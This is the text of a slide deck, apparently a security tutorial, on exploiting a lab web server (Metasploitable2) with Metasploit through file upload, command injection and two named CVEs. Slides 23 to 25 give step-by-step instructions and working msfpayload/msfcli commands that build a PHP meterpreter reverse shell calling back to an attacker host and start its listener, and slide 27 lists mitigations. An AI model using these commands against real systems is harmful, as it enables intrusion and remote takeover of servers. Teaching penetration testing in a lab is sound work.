  • 3.  Kali Linux – Our attacker machine  Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.  Metasploitable2 – Victim Web Server
  • 4. Exploiting the backend server through a web application.
  • 5.  Reasons why hackers want to compromise the server:  Run attacks against the internal network  Use the server as a bot  Install backdoors onto the server  Reveal sensitive files/passwords  Execute any local file  Execute remote files  and more…
  • 6.  Vulnerabilities that are dangerous against a server  DirectoryTraversal  Local File Inclusion  Remote File Inclusion  Remote Code Execution  SQL Injection  Command Injection
  • 12.
  • 13.
  • 14.  Metasploit is an open-source framework used for Security development and testing  Information gathering and fingerprinting  Exploitation/Penetration testing  Payload generation and encoding  Fuzzing  And much more…
  • 15.  Command Line Interfaces  msfconsole  msfcli  GUI Interfaces  Metasploit Community Edition  Armitage
  • 16.  Modules  Exploit – Exploitation/Proof-of-Concept code ▪ Ruby on Rails exploit ▪ PHP-CGI exploit  Auxiliary – Misc. modules for multiple purposes ▪ Scanners ▪ DDOS tools ▪ Fingerprinting ▪ Clients  Payloads – Code to be executed on the exploited system ▪ System Shells ▪ Meterpreter Shells  Post – Modules for post-exploitation tasks ▪ Persistence ▪ Password Stealing ▪ Pivoting
  • 17.  Active Exploits  Actively exploit a host.  Ex: Ruby on Rails XML exploit  Passive Exploits  Wait’s for incoming hosts, then exploits them  Ex: Java 0-days  Exploits contain payloads
  • 18.  Inline (Non Staged)  Payload containing the exploit and shell code  Stable  Large size  Staged  Exploits victim, establishes connection with attacker, pulls down the payload  Meterpreter  Advanced, dynamic payload.  Extended over the network  Extensible through modules and plugins
  • 19.  Types of connections  Bind ▪ Local server gets started on victim machine ▪ Attacker connects to victim ▪ windows/x64/shell/bind_tcp  Reverse ▪ Local server gets started on attacker machine ▪ Victim connects to attacker ▪ windows/x64/shell/reverse_tcp
  • 20.
  • 21.  CVE 2012-1823  DOS attack ▪ -T 10000  Source code disclosure ▪ -s argument  Remote Code Execution ▪ -d argument
  • 22.  CVE-2013-0156  Easy to find, easy to exploit, critical vulnerability.  Requires just one POST request containing a specially crafted XML data.  Send commands through YAML objects
  • 23.  The upload functionality allows for any file type to be uploaded 1. Upload server-side code and check if it executes ▪ PHP = <?php echo “HelloWorld!”; ?> ▪ ASP = <% Response.Write "HelloWorld!" %> ▪ JSP = <%= new java.util.Date().toString() %> 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Upload the shell and execute it
  • 24.  Allows an attacker to execute system level commands. 1. Attempt a safe command 1. echo test 2. uname -a 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Inject curl or wget commands to download the shell onto the victim machine. 5. Chmod if necessary and execute
  • 25.  msfpayload php/meterpreter/reverse_tcp O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php  # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.  ==================================  msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
  • 26.
  • 27.  Keep software up to date!  PHP: 5.4.3, 5.3.13  Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15  Use whitelisting for file upload extensions  Watch for extensions and content-types  Don’t let upload directory be executable  Rename files if possible  Don’t pass user input as a system command!  Use library calls when possible  Sanitize input
  • 28.
  • 29.  BackTrack-Linux  http://www.kali.org/  The Metasploit Project  http://www.metasploit.com/  Metasploit Unleashed  http://www.offensive-security.com/metasploit-unleashed/  PHP-CGI Advisory  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  Ruby on Rails Exploitation  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with- metasploit-cve-2013-0156  DamnVulnerable Web Application (DVWA)  http://www.dvwa.co.uk/  Metasploitable 2  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web